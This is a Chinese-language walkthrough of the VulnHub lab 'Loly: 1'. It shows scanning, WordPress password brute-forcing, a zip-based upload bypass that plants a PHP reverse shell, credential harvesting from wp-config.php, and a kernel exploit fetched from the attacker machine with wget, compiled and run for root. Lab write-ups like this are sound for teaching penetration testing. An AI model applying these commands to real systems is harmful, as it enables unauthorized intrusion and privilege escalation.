当前位置: 首页 > java >正文

Loly: 1靶场渗透

Loly: 1

来自 <Loly: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.241

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.241

访问80端口的http服务

扫描网站子目录

dirsearch -u http://192.168.23.241 -x 403,404

 

4,扫描出来了wordpress的网页,访问看看

加载缓慢,修改/etc/hosts文件试试

echo "192.168.23.241 loly.lc" >>/etc/hosts

访问 http://loly.lc/wordpress/ 的速度果然变快了

登录网站如下 http://loly.lc/wordpress/wp-login.php

 

5,对网站进行指纹识别扫描

whatweb -v http://loly.lc/wordpress/

 

6,然后再尝试使用wpscan进行扫描爆破用户名

gunzip /usr/share/wordlists/rockyou.txt.gz

成功爆破出账户密码loly/fernando

 

7,使用账户密码进行登录,登录成功

然后寻找webshell的上传点

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

上传失败

先上传zip文件,访问的时候以php后缀名访问

mv php-reverse-shell.php shell.php

zip -r -o shell.php.zip shell.php

再次上传,上传文件成功

然后看到文件上传的位置,由此进行一个访问触发反弹shell

http://loly.lc/wordpress/wp-content/banners/shell.php

与此同时kali打开对4444端口的监听,成功getshell

 

8,然后使用python脚本获取一个可交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下,一般的套路就是阅读mysql数据库配置文件,获取数据库账户密码。然后登录数据库,获取普通用户/超级用户泄露的账号密码

cat wp-config.php

得到mysql账号密码wordpress/lolyisabeautifulgirl

 

9,然后登录mysql数据库

mysql -u wordpress -p

show databases;

use  wordpress;

show tables;

select * from wp_users;

但是这个密码没什么用

 

10,发现使用这个密码可以直接切换loly用户

lolyisabeautifulgirl

uname -a

lsb_release -a

搜索内核提权漏洞

searchsploit 4.4.0-31 ubuntu Privilege

把脚本下载到当前目录下

searchsploit -m 45010.c

 

11,在kali使用python开启监听,然后靶机使用wget下载即可
python -m http.server

wget http://192.168.23.182:8000/45010.c

使用gcc编译器编译提权exp

gcc 45010.c -o exp

chmod +x exp

./exp

提权成功,成功get flag

 

 

http://www.xdnf.cn/news/4538.html

相关文章:

  • 大模型 Function Calling 学习路线图
  • Solana批量转账教程:提高代币持有地址和生态用户空投代币
  • 缓存菜品-04.功能测试
  • C++ 静态成员
  • 大模型系列(四)--- GPT2: Language Models are Unsupervised Multitask Learners​
  • Java 多线程编程:从基础到实战!
  • Ceph集群OSD运维手册:基础操作与节点扩缩容实战
  • MSTP 实验拓扑配置(ENSP)
  • 自动化创业机器人:现状、挑战与Y Combinator的启示
  • hadoop中的序列化和反序列化(3)
  • React学习路线-Deepseek版
  • 搭建spark伪分布集群
  • windows10 环境下通过huggingface_hub下载huggingface社区模型
  • 子集树算法文档
  • 驱动开发硬核特训 · 专题篇:Vivante GPU 与 DRM 图形显示体系全解析(i.MX8MP 平台实战)
  • 机器学习在信用卡欺诈检测中的应用思考
  • 4.9/Q1,GBD数据库最新文章解读
  • Admyral - 可扩展的GRC工程自动化平台
  • 【MCP】function call与mcp若干问题整理
  • 汽车加气站操作工考试知识点总结
  • 云渲染农场:让复杂渲染变得简单高效
  • OpenCV计算机视觉实战(3)——计算机图像处理基础
  • OpenCV 中用于背景分割的一个类cv::bgsegm::BackgroundSubtractorGMG
  • DeepSeek智能时空数据分析(八):NL2SQL绘制河流-轨迹缓冲区如何生成
  • 如何在自己的服务器上部署静态网页并通过IP地址进行访问
  • 使用 Celery + Redis + Eventlet 实现 Python 异步编程(Windows 环境)
  • STM32--TIM--函数
  • 卢dns免费二级域名分发
  • 【Python os模块完全指南】从基础到高效文件操作
  • 智算中心基础设施0-1建设全流程及投产后的运维